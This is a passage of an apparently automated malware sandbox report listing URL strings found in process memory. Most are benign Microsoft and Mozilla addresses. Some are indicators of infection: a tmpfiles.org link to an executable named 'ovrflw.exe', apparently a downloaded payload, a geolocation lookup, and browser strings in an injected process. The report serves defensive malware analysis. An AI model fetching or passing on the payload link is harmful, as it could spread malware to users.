                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108263597.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2105360073.0000027EC1710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108263597.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                                Source: svchost.exe, 0000000D.00000003.2108371573.0000027EC1727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srff
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                                Source: svchost.exe, 0000000D.00000003.2108371573.0000027EC1727000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108263597.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108263597.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                                Source: svchost.exe, 0000000D.00000003.2108371573.0000027EC1727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srfX
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                                Source: svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108263597.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108263597.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC172C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108652806.0000027EC1756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                                Source: svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108263597.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4104041083.0000027EC1E35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                                Source: svchost.exe, 0000000D.00000003.2104497925.0000027EC172C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                                Source: svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108652806.0000027EC1756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                                Source: svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                                Source: svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806043
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108036976.0000027EC1757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                                Source: svchost.exe, 0000000D.00000003.2105979556.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC1729000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                                Source: svchost.exe, 0000000D.00000003.2105915446.0000027EC175A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC172C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                                Source: svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp8
                                Source: svchost.exe, 0000000D.00000002.4102771346.0000027EC0E2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4104041083.0000027EC1E35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                                Source: svchost.exe, 0000000D.00000003.2105360073.0000027EC1710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                                Source: svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
                                Source: svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                                Source: svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                                Source: svchost.exe, 0000000D.00000002.4103556512.0000027EC0EE5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4103455410.0000027EC0ECA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                                Source: svchost.exe, 0000000D.00000002.4103556512.0000027EC0EE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srfityCRL
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                                Source: svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf~
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                                Source: svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJ
                                Source: svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.
                                Source: svchost.exe, 0000000D.00000003.2105360073.0000027EC1710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                                Source: svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                                Source: svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                                Source: svchost.exe, 0000000D.00000003.2108146136.0000027EC1763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2108097283.0000027EC1740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                                Source: svchost.exe, 0000000D.00000003.2105360073.0000027EC1710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
                                Source: svchost.exe, 0000000D.00000003.2108371573.0000027EC1727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
                                Source: svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfen
                                Source: svchost.exe, 0000000D.00000003.2105360073.0000027EC1710000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                                Source: svchost.exe, 0000000D.00000003.2105360073.0000027EC1710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
                                Source: qmgr.db.12.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
                                Source: svchost.exe, 0000000D.00000003.2107864391.0000027EC173B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4102843006.0000027EC0E45000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2104497925.0000027EC172C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                                Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000002.4134787389.0000000000F62000.00000040.00000001.01000000.0000001F.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000003.4083127627.0000000005770000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.4452302176.00000000001B2000.00000040.00000001.01000000.00000020.sdmp, svchost.exe, 0000002A.00000003.4159859843.0000000005800000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                                Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000002.4134787389.0000000000F62000.00000040.00000001.01000000.0000001F.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000003.4083127627.0000000005770000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.4452302176.00000000001B2000.00000040.00000001.01000000.00000020.sdmp, svchost.exe, 0000002A.00000003.4159859843.0000000005800000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.4552683302.00000000059A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                                Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000002.4134787389.0000000000F62000.00000040.00000001.01000000.0000001F.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000003.4083127627.0000000005770000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.4452302176.00000000001B2000.00000040.00000001.01000000.00000020.sdmp, svchost.exe, 0000002A.00000003.4159859843.0000000005800000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
                                Source: aspnet_regiis.exe, 00000014.00000002.2811418680.00000000004A6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                Source: aspnet_regiis.exe, 00000014.00000003.2794714048.000000002F806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tmpfiles.org/
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tmpfiles.org/dl/9042030/ovrflw.exe
                                Source: axplong.exe, 00000002.00000002.4458206583.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tmpfiles.org/dl/9042030/ovrflw.exeQ
                                Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000002.4134787389.0000000000F62000.00000040.00000001.01000000.0000001F.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000003.4083127627.0000000005770000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000002A.00000002.4452302176.00000000001B2000.00000040.00000001.01000000.00000020.sdmp, svchost.exe, 0000002A.00000003.4159859843.0000000005800000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.keycdn.com/geo.json
                                Source: aspnet_regiis.exe, 00000014.00000002.2829566598.00000000295E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                                Source: aspnet_regiis.exe, 00000014.00000002.2829566598.00000000295E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2236098359.0000000003BCB000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.00000000031EB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000003.2711798352.0000000003376000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2236098359.0000000003BCB000.00000004.00000800.00020000.00000000.sdmp, VP2pdCInvS.exe, 0000000B.00000002.2231034006.00000000031EB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000003.2711798352.0000000003376000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                Source: aspnet_regiis.exe, 00000014.00000002.2811418680.000000000054A000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2811418680.00000000004A6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                Source: aspnet_regiis.exe, 00000014.00000002.2811418680.00000000004A6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ECBGIIJK
                                Source: aspnet_regiis.exe, 00000014.00000002.2811418680.00000000004A6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/ECBGIIJK---DHCAECGIEBKJKEBGDHDA
                                Source: aspnet_regiis.exe, 00000014.00000003.2794714048.000000002F806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                                Source: aspnet_regiis.exe, 00000014.00000002.2811418680.000000000054A000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000014.00000002.2811418680.00000000004A6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                Source: aspnet_regiis.exe, 00000014.00000003.2794714048.000000002F806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                                Source: aspnet_regiis.exe, 00000014.00000002.2811418680.00000000004A6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/npvZC5maWxl
                                Source: aspnet_regiis.exe, 00000014.00000002.2811418680.000000000054A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                Source: aspnet_regiis.exe, 00000014.00000003.2794714048.000000002F806000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                Source: aspnet_regiis.exe, 00000014.00000002.2811418680.00000000004A6000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
